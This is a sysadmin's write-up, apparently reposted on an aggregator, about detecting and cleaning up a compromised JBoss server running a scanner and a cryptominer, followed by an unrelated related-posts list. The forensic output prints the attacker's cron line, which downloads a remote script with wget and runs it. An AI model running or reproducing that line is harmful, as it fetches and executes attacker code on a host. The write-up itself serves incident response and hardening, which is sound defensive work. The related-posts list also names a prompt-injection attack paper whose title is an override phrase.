小雄free
小雄free

Detecting a Hacker Attack

I work as a system administrator for a company monitoring around 20 servers running open source applications . One of the application we are using is Jboss . The Jboss version we are running is an old version (4.0) as per client requirement .We have upgraded jboss to the latest after this incident . Besides this we  are using Nagios for application and Infrastructure monitoring. 
The alarm of a server getting compromised raised on a Monday morning when we saw continuous Nagios high load alerts from the server running old version of Jboss . The alerts actually started coming from Saturday morning .

I immediately logged to the affected machine and the first few commands I run was w and top command .

Checking System Load and identifying top contributor

top command showed high load on the system with some perl commands running for 'jboss' user with CPU utilization around 100%

# top
top - 15:03:03 up 22 days,  2:37,  1 user,  load average: 29.02, 28.40, 23.27
Tasks: 310 total,   3 running, 307 sleeping,   0 stopped,   0 zombie
Cpu(s):  9.7%us,  3.6%sy,  0.0%ni, 86.6%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Mem:  66006160k total, 10932412k used, 55073748k free,   672448k buffers
Swap:  8193108k total,        0k used,  8193108k free,  7534248k cached


  PID USER      PR  NI  VIRT  RES  SHR S %CPU  %MEM    TIME+     COMMAND
19058 jboss     25   0 90228 5720 1252 R 100.1  0.0    9:58.71    perl
16965 jboss     25   0 90316 5844 1296 R 99.8   0.0    453:27.66  perl
......
......

These perl process are unknown to me and no such process are suppose to run with jboss user.  I started checking for memory and disk utilization and they looked normal. Went further on investigation and looked for network bandwidth usage on the host. We are using MRTG and Cacti for monitoring bandwidth usage and MRTG is showing bandwidth link utilisation of more than 100% for ethernet interface on this host. Interestingly , outgoing traffic is  beyond 100% utilization and so I suspected that probably our machine is being used as a zombie machine to target other machines on Internet . 

Identifying Open files by these process.

I proceeded further . Identified those files which are being used by these perl process . I used losof and strace to collect these information .

#  lsof -p 16965
COMMAND   PID  USER   FD   TYPE     DEVICE     SIZE       NODE NAME
perl    16965 jboss  cwd    DIR      104,2     4096    1996897 /var/tmp
perl    16965 jboss  cwd    DIR      104,2     4096    1996897 /dev/shm
perl    16965 jboss  rtd    DIR      104,9     4096          2 /
perl    16965 jboss  txt    REG      104,3    19208    1993621 /usr/bin/perl
perl    16965 jboss  mem    REG      104,9   139416     262462 /lib64/ld-2.5.so
perl    16965 jboss  mem    REG      104,9  1717800     262463 /lib64/libc-2.5.so
......
......
perl    16965 jboss  mem    REG      104,9    23736     262169 /lib64/libnss_dns-2.5.so
perl    16965 jboss    0r  FIFO        0,6          2859288169 pipe
perl    16965 jboss    1w  FIFO        0,6          2859288170 pipe
perl    16965 jboss    2w  FIFO        0,6          2859288171 pipe
perl    16965 jboss    3u  IPv4 2859288181                 TCP web.example.com:39580->146.X.X.X:https (ESTABLISHED)

# lsof /tmp/
COMMAND   PID  USER   FD   TYPE DEVICE SIZE NODE NAME
pnscan  23415 jboss  cwd    DIR  104,7 4096    2 /tmp/
pnscan  24503 jboss  cwd    DIR  104,7 4096    2 /tmp/
lsof on these process showed some unknown binaries running from /var/tmp, /tmp and /dev/shm directory.


#cd /var/tmp

# ls -la
total 108
drwxrwxrwt  2 root  root   4096 Dec  4 15:49 .
drwxr-xr-x 29 root  root   4096 May  6  2013 ..
-rw-rw-r--  1 jboss jboss  1244 Nov 30 12:13 1
-rwxrwxr-x  1 jboss jboss 34775 Nov 20 12:24 9x9
-rw-rw-r--  1 jboss jboss 38536 Nov 24 04:24 9x9.c
-rwxrwxr-x  1 jboss jboss 11078 Nov 20 12:02 syn


# strace -p 23415
Process 23415 attached - interrupt to quit
[ Process PID=23415 runs in 32 bit mode. ]
poll([{fd=246, events=POLLOUT}], 1, 1000) = 0 (Timeout)
close(246)                              = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 246
fcntl64(246, F_GETFL)                   = 0x2 (flags O_RDWR)
fcntl64(246, F_SETFL, O_RDWR|O_NONBLOCK) = 0connect(246, {sa_family=AF_INET, sin_port=htons(8080), sin_addr=inet_addr("X.X.X.43")}, 16) = -1 EINPROGRESS (Operation now in progress)poll([{fd=246, events=POLLOUT}], 1, 1000) = 0 (Timeout)
close(246)                              = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 246
fcntl64(246, F_GETFL)                   = 0x2 (flags O_RDWR)
fcntl64(246, F_SETFL, O_RDWR|O_NONBLOCK) = 0connect(246, {sa_family=AF_INET, sin_port=htons(8080), sin_addr=inet_addr("X.X.X.51")}, 16) = -1 EINPROGRESS (Operation now in progress)poll([{fd=246, events=POLLOUT}], 1, 1000) = 0 (Timeout)
close(246)                              = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 246
fcntl64(246, F_GETFL)                   = 0x2 (flags O_RDWR)
fcntl64(246, F_SETFL, O_RDWR|O_NONBLOCK) = 0connect(246, {sa_family=AF_INET, sin_port=htons(8080), sin_addr=inet_addr("X.X.X.204")}, 16) = -1 EINPROGRESS (Operation now in progress)


from one of strace command output , lots of connect sessions can be seen to different IP Address on Internet . 

Also , can see a cron job set for jboss user.

# sudo -u jboss crontab -l
@weekly wget -q http://X.X.X.26/scen -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh

Preventive Measures:

1.  Kill processes

     # pkill -9 pnscan

        #  kill -9 16965  19058

2. Deleted unknown binaries 
      

[root@web tmp]# rm -i *
rm: remove regular file `1'? y
rm: remove regular file `9x9'? y
rm: remove regular file `9x9.c'? y
rm: remove regular file `syn'? y


# rm -i /dev/shm/minerd*
rm: remove regular file `/dev/shm/minerd'? y
rm: remove regular file `/dev/shm/minerd.log'? y
rm: remove regular file `/dev/shm/minerd.tar.gz'? y


3. Deleted cron for 'jboss' user


 # sudo -u jboss crontab -r

Hardening Steps:

  1.  Remove executable permission from /var , /var/tmp and /var/tmp
        directory.
          

 # lsof /tmp/
 # umount /tmp/
   umount: /tmp: device is busy
   umount: /tmp: device is busy

 # umount -l /tmp/
 # Update /tmp entry in /etc/fstab with exec,nodev,nosuid options 

   LABEL=/tmp              /tmp                    ext3    defaults,noexec        1 2


 To make the changes manually without reboot of host , mount /tmp with remount option .


 # mount -o  defaults,noexec,nodev,nosuid LABEL=/tmp  /tmp/


2. Perform similar hardening for /var/tmp and /dev/shm directory.

3. Replace login shell for jboss user
                 #usermod -s /bin/false jboss

4 . Disabled home directory for jboss user 
                 #usermod -d /home/jboss jboss

5. Disabled cron for jboss user
                  5.1  Add jboss entry in /etc/cron.deny
                  5.2  touch /var/spool/cron/jboss.disabled              

These steps provided a sigh of relief for our team . We are actually able to prevent our server from being further compromised .

Best advice for a system getting compromised is to remove the machine from network and reinstall from scratch after completing all forensic analysis.
We followed that and after proper testing of applications on Jboss 6 , we migrated to the latest version.  


你可能感兴趣的:(Attack)

  • 网络安全的相关比赛有哪些?需要掌握哪些必备技能? 网安学习 web安全安全网络安全的相关比赛有哪
    01、CTF(夺旗赛)这是一种最常见的网络安全竞技形式,要求参赛者在限定时间内解决一系列涉及密码学、逆向工程、漏洞利用、取证分析等领域的挑战,获取标志(flag)并提交得分。通过举办CTF来培养网络安全人才,已经发展成为了国际网络安全圈的共识。CTF赛事可以分为线上赛和线下赛,线上赛通常是解题模式(Jeopardy),线下赛通常是攻防模式(Attack-Defense)。CTF赛事的代表性线下赛事
  • 论文翻译:arxiv-2022 Ignore Previous Prompt: Attack Techniques For Language Models CSPhD-winston-杨帆 论文翻译LLMs-安全prompt语言模型人工智能
    IgnorePreviousPrompt:AttackTechniquesForLanguageModelshttps://arxiv.org/pdf/2211.09527忽略之前的提示:针对语言模型的攻击技术文章目录忽略之前的提示:针对语言模型的攻击技术摘要1引言摘要基于Transformer的大型语言模型(LLMs)为大规模面向客户的应用程序中的自然语言任务提供了强大的基础。然而,探索恶意用户
  • ssh远程连接主机报错:Someone could be eavesdropping on you right now (man-in-the-middle attack)! Imagine Miracle Linuxlinuxssh
    ssh连接报错imaginemiracle:[email protected]@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@WARNING:REMOTEHOSTIDENTIFICATIONHASCHANGED!@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
  • ssh登录远程主机报错:Someone could be eavesdropping on you right now (man-in-the-middle attack)! lvhdbb linux
    @WARNING:REMOTEHOSTIDENTIFICATIONHASCHANGED!@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ITISPOSSIBLETHATSOMEONEISDOINGSOMETHINGNASTY!Someonecouldbeeavesdroppingonyourightnow(man-in-the
  • 【论文阅读】GLiRA: Black-Box Membership Inference Attack via Knowledge Distillation Bosenya12 模型窃取科研学习论文阅读知识蒸馏成员推理攻击黑盒
    摘要While(虽然)DeepNeuralNetworks(DNNs)havedemonstratedremarkableperformanceintasksrelatedtoperception(感知)andcontrol(控制),therearestillseveralunresolvedconcerns(未解决的问题)regardingtheprivacyoftheirtrainingdat
  • DDoS攻击与防御(一) yunteng521 网络安全ddos网络服务器
    前言这章主要讲述DDoS攻击与防御方式理论知识来源于https://www.microsoft.com/zh-cn/security/business/security-101/what-is-a-ddos-attack1:攻击一般来说,DDoS攻击分为三大类:容量耗尽攻击、协议攻击和资源层攻击。1>容量耗尽攻击通过最初似乎是合法的流量来使网络层不堪重负。这种类型的攻击是最常见的DDoS攻击形式。
  • HGAME 2024 WEEK1 WP 是Mumuzi ctf信息安全
    文章目录WEBezHTTPBypassitSelectCourses2048*16jhatREezASMezPYCezUPXezIDAPWNEzSignInCRYPTO奇怪的图片ezRSAezMathezPRNGMISCSignIn来自星尘的问候simple_attack希儿希儿希尔签到放假比较闲,打打比赛WEBezHTTP来自vidar.club、UA要求阿巴阿巴阿巴、来自本地(提示不是XFF,
  • Unity类银河恶魔城学习记录6-2 P66 Clone‘s Attack源代码 SuKacZev 类银河城学习记录学习游戏引擎类银河C#unity
    Alex教程每一P的教程原代码加上我自己的理解初步理解写的注释,可供学习Alex教程的人参考此代码仅为较上一P有所改变的代码【Unity教程】从0编程制作类银河恶魔城游戏_哔哩哔哩_bilibiliClone_Skill.csusingSystem.Collections;usingSystem.Collections.Generic;usingUnityEngine;publicclassClo
  • Unity类银河恶魔城学习记录4-8 P61 Player‘s Counter Attack源代码 SuKacZev 类银河城学习记录学习UnityC#类银河unity游戏引擎
    Alex教程每一P的教程原代码加上我自己的理解初步理解写的注释,可供学习Alex教程的人参考此代码仅为较上一P有所改变的代码【Unity教程】从0编程制作类银河恶魔城游戏_哔哩哔哩_bilibiliPlayer.csusingSystem.Collections;usingSystem.Collections.Generic;usingUnity.VisualScripting;usingUnit
  • Unity类银河恶魔城学习记录4-7 P60 Counter‘s attack window 源代码 SuKacZev 学习游戏引擎类银河C#unity
    Alex教程每一P的教程原代码加上我自己的理解初步理解写的注释,可供学习Alex教程的人参考此代码仅为较上一P有所改变的代码【Unity教程】从0编程制作类银河恶魔城游戏_哔哩哔哩_bilibiliEnemy.csusingSystem.Collections;usingSystem.Collections.Generic;usingUnity.VisualScripting;usingUnity
  • Unity类银河恶魔城学习记录4-1,4-2 Attack Logic,Collider‘s collision excepetion源代码 P54 p55 SuKacZev 学习C#Unity类银河unity游戏引擎
    Alex教程每一P的教程原代码加上我自己的理解初步理解写的注释,可供学习Alex教程的人参考此代码仅为较上一P有所改变的代码【Unity教程】从0编程制作类银河恶魔城游戏_哔哩哔哩_bilibiliEntity.csusingSystem.Collections;usingSystem.Collections.Generic;usingUnityEngine;publicclassEntity:M
  • Unity类银河恶魔城学习记录4-4 4-5 P57-58 On Hit Impactp- Attack‘direction fix源代码 SuKacZev 学习游戏引擎C#Unityunity
    Alex教程每一P的教程原代码加上我自己的理解初步理解写的注释,可供学习Alex教程的人参考此代码仅为较上一P有所改变的代码【Unity教程】从0编程制作类银河恶魔城游戏_哔哩哔哩_bilibiliEntity.csusingSystem.Collections;usingSystem.Collections.Generic;usingUnityEngine;publicclassEntity:M
  • 【目录】CSAPP的实验简介与解法总结(已包含Attack/Link/Architecture/Cache) BU冰糖雪梨里的梨PT 《CS:APP》的实验csapp深入理解计算机系统15213
    文章目录AttackLab(缓冲区溢出实验)对应书上Chap3LinkLab(链接实验)对应书上Chap7ArchitectureLab(体系结构实验)对应书上Chap4-5CacheLab(缓存实验)对应书上Chap6AttackLab(缓冲区溢出实验)对应书上Chap3大意待攻击的程序中使用了gets函数获取用户输入,你作为攻击者要输入一些内容来转移程序的控制权。收获理解了gets函数为什么被
  • 针对思科被黑客攻击事件的简单分析 熊猫正正 安全网络安全安全威胁分析系统安全
    前言近日,思科发布了自己被黑客组织进行网络攻击的应急响应报告,报告原文链接:https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html报告指出思科在2022年5月24日,被发现有入侵活动,于是思科安全事件响应(CSIRT)部门与思科一起进行了应急响应分析溯源。同时国外某媒体也报道,思科在2022年5月下旬被Yanluowa
  • attack demo - USMA goodcat666 pwn_cve_kernellinuxpwn
    USMA(User-Space-Mapping-Attack)允许普通用户进程可以映射内核态内存并且修改内核代码段,通过这个方法,我们可以绕过Linux内核中的CFI缓解措施,在内核态中执行任意代码360漏洞研究院:USMA:用户态映射攻击视频文档pwnhub3月公开赛-kheap0x20大小的UAF,开启了SMEP\KASLR之前的方式是通过seq_operation结构体函数指针劫持+栈迁移,
  • gitlab 403 forbidden 报错解决 R6N gitlabmysqljavalinuxtomcat
    问题使用自搭建的Gitlab。但打开页面的时候显示的是空白页面,上面还有一次文本Forbidden。原因Gitlab使用rack_attack做了并发访问的限制。解决方案将Gitlab的IP设置为白名单即可。步骤如下:打开/etc/gitlab/gitlab.rb文件。查找gitlab_rails['rack_attack_git_basic_auth']关键词。取消注释修改ip_whitelis
  • docker 安装下 Gitlab 403 forbidden 问题解决 秋名山车神不开车 linuxforbiddenGitlabdocker
    1.打开gitlab网站报错forbidden,并发引起IP被封2.dockerps找到gitlab容器id3.dockerexec-tid084d006a65fbash进入容器目录4.cd/etc/gitlab/目录,vigitlab.rb文件5.增加你的ip地址gitlab_rails['rack_attack_git_basic_auth']={'enabled'=>true,'ip_whi
  • linux宝塔forbidden,宝塔部署 Gitlab 报错处理方案 weixin_39573535
    错误1:Gitlab报错403Forbidden原因:是由于IP被封禁的原因打开/etc/gitlab/gitlab.rb找到gitlab_rails['rack_attack_git_basic_auth']将注释打开添加ip_whitelist白名单列表gitlab_rails['rack_attack_git_basic_auth']={'enabled'=>true,'ip_whiteli
  • Gitlab服务器 forbidden 爱问的艾文 管理软件
    Gitlab服务器页面显示“forbidden”首先我们通过forbidden这个单词他的中文意思是“被禁止”的意思,也就是说,你的访问请求是被服务器给禁止了,具体什么原因呢?这个问题我也去查了一下,比较好理解的方式是“Gitlab使用rack_attack做了并发访问的限制”针对某个IP并发过大,就会限制那个IP的访问,也就是说,你的gitlab服务器的IP访问并发量过大,gitlab为了防止收
  • gitlab 403 forbidden解决方法 振峰#9527 项目管理
    现象:运行的好好的gitlab突然间就出现forbidden的页面,换手机网络尝试,可以正常。gitlab-ctltail发现针对某个ip访问有大量403解决方法:进入redis查看是否有ip被封/opt/gitlab/embedded/bin/./redis-cli-s/var/opt/gitlab/redis/redis.socketkeys'*'|grep'rack::attack'删掉即可
  • gitlab提示403,forbidden banche168 gitlab版本管理gitlabforbidden403
    背景:最近在做Gitlab并发性能测试时遇到如下错误信息错误提示:1.web端只显示forbidden字样forbidden用git拉取代码时提示fatal:unabletoaccess'http://xxxx.git/':TherequestedURLreturnederror:403原因在于gitlab使用rack_attack做了并发访问控制解决办法:修改gitlab默认配置–白名单步骤:一
  • 攻击资源合集 苍简
    相关资源列表https://mitre-attack.github.io/mitre科技机构对攻击技术的总结wikihttps://huntingday.github.ioMITRE|ATT&CK中文站https://arxiv.org康奈尔大学(CornellUniversity)开放文档http://www.owasp.org.cn/owasp-project/owasp-thingsOWAS
  • Attack Lab:Phase1~Phase5【缓冲区溢出实验】 BU冰糖雪梨里的梨PT 《CS:APP》的实验缓冲区溢出csappattacklab汇编
    注:本实验所用文件不是csapp官网给出的,是学校下发的。可以参考我的思路。phase1本阶段目标是使getbuf调用结束后,控制权交给touch1函数。则我们要知道两件事:一是缓冲区大小,二是touch1在虚拟内存中的位置。用objdump-dctarget>ctarget.s命令,反汇编ctarget代码。用本机安装的vs打开,方便阅读。如下图,缓冲区大小为0x38字节,即56字节。如下图,t
  • Python军事游戏 python无人驾驶 医学芯片 python游戏开发语言
    以下是一个简单的Python军事游戏代码:importrandom#初始化玩家和敌人的生命值player_health=100enemy_health=random.randint(50,100)#游戏循环whileplayer_health>0andenemy_health>0:#玩家攻击敌人player_attack=random.randint(10,20)enemy_health-=pla
  • Corelight中ATT&CK的覆盖情况 Threathunter
    https://mitre-attack.corelight.com/https://mitre-attack.corelight.com/c2/t1094-custom-command-and-control-protocolhttps://fs.hubspotusercontent00.net/hubfs/8645105/white-paper/help-analysts-find-comma
  • Py实现人狗大战 云原生解决方案 python之路python
    attack_vals={"京巴":30,"藏獒":80,}defdog(name,d_type):#模版data={"name":name,"d_type":d_type,"life_val":100,}ifd_typeinattack_vals:data["attack_val"]=attack_vals[d_type]else:data["attack_val"]=15defdog_bite
  • 【蓝桥备赛】明日方舟大作战——简单01背包 lcx_defender #蓝桥杯蓝桥杯算法c++java动态规划
    题目链接明日方舟大作战个人思路需要使用有限的预算B,最大化我们的攻击力attack之和,这个就是经典的01背包问题。已知条件有第i个物品的重量wiw_{i}wi,价值viv_{i}vi,以及背包的总容量W。每个物体只有两种可能的状态(装入背包与不装入背包)。要求选若干物品放入背包使背包中物品的总价值最大且背包中物品的总重量不超过背包的容量。在本题中,背包容量即所给预算B,物品的重量是干员的费用,物
  • 无线网络攻防之——Evil Twin Attack的第二部分 Pleasure1234 网络安全电脑
    下面是第二部分之前在用二分法查找到底是那一部分内容出错没有提示实在不知到是哪里违反了社区规定,但是又一步都不能少只能先尝试分割成三个部分,至少别因为话题被识别为敏感而被封也算是知道为什么社区中好多文章的篇幅都那么短了……下面是正文部分:正式开始这回我们还是采取同样的方式:用手机开了个热点供我们试验首先打开在虚拟机中的Kali系统,右键以管理员模式开启终端,输入ifconfig使得网卡能够被识别到。
  • unity学习笔记----游戏练习07 2301_79022588 学习笔记游戏
    一、僵尸攻击和植物的掉血和销毁当僵尸接触到植物开始攻击时会持续削减植物的血量,当植物血量为零时就销毁当前植物。在plantManager中,为植物添加一个血量HP=100,publicintHP=100;在写一个减少血量的方法,来减少血量。publicvoidLostHP(intattack){HP-=attack;if(HPAktDuration&&CurrentEatPlant!=null){
  • burp靶场--host攻击 0rch1d burp靶场WEB安全渗透测试web安全网络安全
    burp靶场–host攻击https://portswigger.net/web-security/host-header#what-is-an-http-host-header-attack在本节中,我们将讨论错误配置和有缺陷的业务逻辑如何通过HTTP主机标头使网站遭受各种攻击。我们将概述用于识别易受HTTP主机标头攻击的网站的高级方法,并演示如何利用此方法进行以下类型的攻击:密码重置中毒实验室
  • 多线程编程之卫生间 周凡杨 java并发卫生间线程厕所
    如大家所知,火车上车厢的卫生间很小,每次只能容纳一个人,一个车厢只有一个卫生间,这个卫生间会被多个人同时使用,在实际使用时,当一个人进入卫生间时则会把卫生间锁上,等出来时打开门,下一个人进去把门锁上,如果有一个人在卫生间内部则别人的人发现门是锁的则只能在外面等待。问题分析:首先问题中有两个实体,一个是人,一个是厕所,所以设计程序时就可以设计两个类。人是多数的,厕所只有一个(暂且模拟的是一个车厢)。
  • How to Install GUI to Centos Minimal sunjing linuxInstallDesktopGUI
    http://www.namhuy.net/475/how-to-install-gui-to-centos-minimal.html   I have centos 6.3 minimal running as web server. I’m looking to install gui to my server to vnc to my server. You can insta
  • Shell 函数 daizj shell函数
    Shell 函数 linux shell 可以用户定义函数,然后在shell脚本中可以随便调用。 shell中函数的定义格式如下: [function] funname [()]{ action; [return int;] } 说明: 1、可以带function fun() 定义,也可以直接fun() 定义,不带任何参数。 2、参数返回
  • Linux服务器新手操作之一 周凡杨 Linux 简单 操作
    1.whoami      当一个用户登录Linux系统之后,也许他想知道自己是发哪个用户登录的。      此时可以使用whoami命令。      [ecuser@HA5-DZ05 ~]$ whoami       e
  • 浅谈Socket通信(一) 朱辉辉33 socket
    在java中ServerSocket用于服务器端,用来监听端口。通过服务器监听,客户端发送请求,双方建立链接后才能通信。当服务器和客户端建立链接后,两边都会产生一个Socket实例,我们可以通过操作Socket来建立通信。    首先我建立一个ServerSocket对象。当然要导入java.net.ServerSocket包    ServerSock
  • 关于框架的简单认识 西蜀石兰 框架
    入职两个月多,依然是一个不会写代码的小白,每天的工作就是看代码,写wiki。 前端接触CSS、HTML、JS等语言,一直在用的CS模型,自然免不了数据库的链接及使用,真心涉及框架,项目中用到的BootStrap算一个吧,哦,JQuery只能算半个框架吧,我更觉得它是另外一种语言。 后台一直是纯Java代码,涉及的框架是Quzrtz和log4j。 都说学前端的要知道三大框架,目前node.
  • You have an error in your SQL syntax; check the manual that corresponds to your 林鹤霄
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'option,changed_ids  ) values('0ac91f167f754c8cbac00e9e3dc372
  • MySQL5.6的my.ini配置 aigo mysql
    注意:以下配置的服务器硬件是:8核16G内存    [client]   port=3306   [mysql]   default-character-set=utf8     [mysqld]   port=3306   basedir=D:/mysql-5.6.21-win
  • mysql 全文模糊查找 便捷解决方案 alxw4616 mysql
    mysql 全文模糊查找 便捷解决方案 2013/6/14 by 半仙 [email protected] 目的: 项目需求实现模糊查找. 原则: 查询不能超过 1秒. 问题: 目标表中有超过1千万条记录. 使用like '%str%' 进行模糊查询无法达到性能需求. 解决方案: 使用mysql全文索引. 1.全文索引 : MySQL支持全文索引和搜索功能。MySQL中的全文索
  • 自定义数据结构 链表(单项 ,双向,环形) 百合不是茶 单项链表双向链表
         链表与动态数组的实现方式差不多,    数组适合快速删除某个元素    链表则可以快速的保存数组并且可以是不连续的       单项链表;数据从第一个指向最后一个   实现代码:        //定义动态链表 clas
  • threadLocal实例 bijian1013 javathreadjava多线程threadLocal
    实例1: package com.bijian.thread; public class MyThread extends Thread { private static ThreadLocal tl = new ThreadLocal() { protected synchronized Object initialValue() { return new Inte
  • activemq安全设置—设置admin的用户名和密码 bijian1013 javaactivemq
            ActiveMQ使用的是jetty服务器, 打开conf/jetty.xml文件,找到 <bean id="adminSecurityConstraint" class="org.eclipse.jetty.util.security.Constraint"> <p
  • 【Java范型一】Java范型详解之范型集合和自定义范型类 bit1129 java
    本文详细介绍Java的范型,写一篇关于范型的博客原因有两个,前几天要写个范型方法(返回值根据传入的类型而定),竟然想了半天,最后还是从网上找了个范型方法的写法;再者,前一段时间在看Gson, Gson这个JSON包的精华就在于对范型的优雅简单的处理,看它的源代码就比较迷糊,只其然不知其所以然。所以,还是花点时间系统的整理总结下范型吧。   范型内容 范型集合类 范型类
  • 【HBase十二】HFile存储的是一个列族的数据 bit1129 hbase
    在HBase中,每个HFile存储的是一个表中一个列族的数据,也就是说,当一个表中有多个列簇时,针对每个列簇插入数据,最后产生的数据是多个HFile,每个对应一个列族,通过如下操作验证   1. 建立一个有两个列族的表   create 'members','colfam1','colfam2'   2. 在members表中的colfam1中插入50*5
  • Nginx 官方一个配置实例 ronin47 nginx 配置实例
    user www www; worker_processes 5; error_log logs/error.log; pid logs/nginx.pid; worker_rlimit_nofile 8192; events { worker_connections 4096;} http { include conf/mim
  • java-15.输入一颗二元查找树,将该树转换为它的镜像, 即在转换后的二元查找树中,左子树的结点都大于右子树的结点。 用递归和循环 bylijinnan java
    //use recursion public static void mirrorHelp1(Node node){ if(node==null)return; swapChild(node); mirrorHelp1(node.getLeft()); mirrorHelp1(node.getRight()); } //use no recursion bu
  • 返回null还是empty bylijinnan javaapachespring编程
    第一个问题,函数是应当返回null还是长度为0的数组(或集合)? 第二个问题,函数输入参数不当时,是异常还是返回null? 先看第一个问题 有两个约定我觉得应当遵守: 1.返回零长度的数组或集合而不是null(详见《Effective Java》) 理由就是,如果返回empty,就可以少了很多not-null判断: List<Person> list
  • [科技与项目]工作流厂商的战略机遇期 comsci 工作流
          在新的战略平衡形成之前,这里有一个短暂的战略机遇期,只有大概最短6年,最长14年的时间,这段时间就好像我们森林里面的小动物,在秋天中,必须抓紧一切时间存储坚果一样,否则无法熬过漫长的冬季。。。。         在微软,甲骨文,谷歌,IBM,SONY
  • 过度设计-举例 cuityang 过度设计
    过度设计,需要更多设计时间和测试成本,如无必要,还是尽量简洁一些好。 未来的事情,比如 访问量,比如数据库的容量,比如是否需要改成分布式  都是无法预料的 再举一个例子,对闰年的判断逻辑:   1、 if($Year%4==0) return True; else return Fasle;   2、if (   ($Year%4==0  &am
  • java进阶,《Java性能优化权威指南》试读 darkblue086 java性能优化
    记得当年随意读了微软出版社的.NET 2.0应用程序调试,才发现调试器如此强大,应用程序开发调试其实真的简单了很多,不仅仅是因为里面介绍了很多调试器工具的使用,更是因为里面寻找问题并重现问题的思想让我震撼,时隔多年,Java已经如日中天,成为许多大型企业应用的首选,而今天,这本《Java性能优化权威指南》让我再次找到了这种感觉,从不经意的开发过程让我刮目相看,原来性能调优不是简单地看看热点在哪里,
  • 网络学习笔记初识OSI七层模型与TCP协议 dcj3sjt126com 学习笔记
      协议:在计算机网络中通信各方面所达成的、共同遵守和执行的一系列约定   计算机网络的体系结构:计算机网络的层次结构和各层协议的集合。   两类服务:   面向连接的服务通信双方在通信之前先建立某种状态,并在通信过程中维持这种状态的变化,同时为服务对象预先分配一定的资源。这种服务叫做面向连接的服务。   面向无连接的服务通信双方在通信前后不建立和维持状态,不为服务对象
  • mac中用命令行运行mysql dcj3sjt126com mysqllinuxmac
    参考这篇博客:http://www.cnblogs.com/macro-cheng/archive/2011/10/25/mysql-001.html  感觉workbench不好用(有点先入为主了)。 1,安装mysql 在mysql的官方网站下载 mysql 5.5.23 http://www.mysql.com/downloads/mysql/,根据我的机器的配置情况选择了64
  • MongDB查询(1)——基本查询[五] eksliang mongodbmongodb 查询mongodb find
    MongDB查询 转载请出自出处:http://eksliang.iteye.com/blog/2174452 一、find简介 MongoDB中使用find来进行查询。 API:如下 function ( query , fields , limit , skip, batchSize, options ){.....}  参数含义: query:查询参数 fie
  • base64,加密解密 经融加密,对接 y806839048 经融加密对接
    String data0 = new String(Base64.encode(bo.getPaymentResult().getBytes(("GBK")))); String data1 = new String(Base64.decode(data0.toCharArray()),"GBK"); // 注意编码格式,注意用于加密,解密的要是同
  • JavaWeb之JSP概述 ihuning javaweb
      什么是JSP?为什么使用JSP? JSP表示Java Server Page,即嵌有Java代码的HTML页面。使用JSP是因为在HTML中嵌入Java代码比在Java代码中拼接字符串更容易、更方便和更高效。   JSP起源    在很多动态网页中,绝大部分内容都是固定不变的,只有局部内容需要动态产生和改变。  如果使用Servl
  • apple watch 指南 啸笑天 apple
    1. 文档 WatchKit Programming Guide(中译在线版 By @CocoaChina) 译文 译者 原文 概览 - 开始为 Apple Watch 进行开发 @星夜暮晨 Overview - Developing for Apple Watch 概览 - 配置 Xcode 项目 - Overview - Configuring Yo
  • java经典的基础题目 macroli java编程
    1.列举出 10个JAVA语言的优势 a:免费,开源,跨平台(平台独立性),简单易用,功能完善,面向对象,健壮性,多线程,结构中立,企业应用的成熟平台, 无线应用 2.列举出JAVA中10个面向对象编程的术语 a:包,类,接口,对象,属性,方法,构造器,继承,封装,多态,抽象,范型 3.列举出JAVA中6个比较常用的包 Java.lang;java.util;java.io;java.sql;ja
  • 你所不知道神奇的js replace正则表达式 qiaolevip 每天进步一点点学习永无止境纵观千象regex
    var v = 'C9CFBAA3CAD0'; console.log(v); var arr = v.split(''); for (var i = 0; i < arr.length; i ++) { if (i % 2 == 0) arr[i] = '%' + arr[i]; } console.log(arr.join('')); console.log(v.r
  • [一起学Hive]之十五-分析Hive表和分区的统计信息(Statistics) superlxw1234 hivehive分析表hive统计信息hive Statistics
    关键字:Hive统计信息、分析Hive表、Hive Statistics   类似于Oracle的分析表,Hive中也提供了分析表和分区的功能,通过自动和手动分析Hive表,将Hive表的一些统计信息存储到元数据中。   表和分区的统计信息主要包括:行数、文件数、原始数据大小、所占存储大小、最后一次操作时间等;   14.1 新表的统计信息 对于一个新创建
  • Spring Boot 1.2.5 发布 wiselyman spring boot
        Spring Boot 1.2.5已在7月2日发布,现在可以从spring的maven库和maven中心库下载。   这个版本是一个维护的发布版,主要是一些修复以及将Spring的依赖提升至4.1.7(包含重要的安全修复)。   官方建议所有的Spring Boot用户升级这个版本。   项目首页 | 源
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他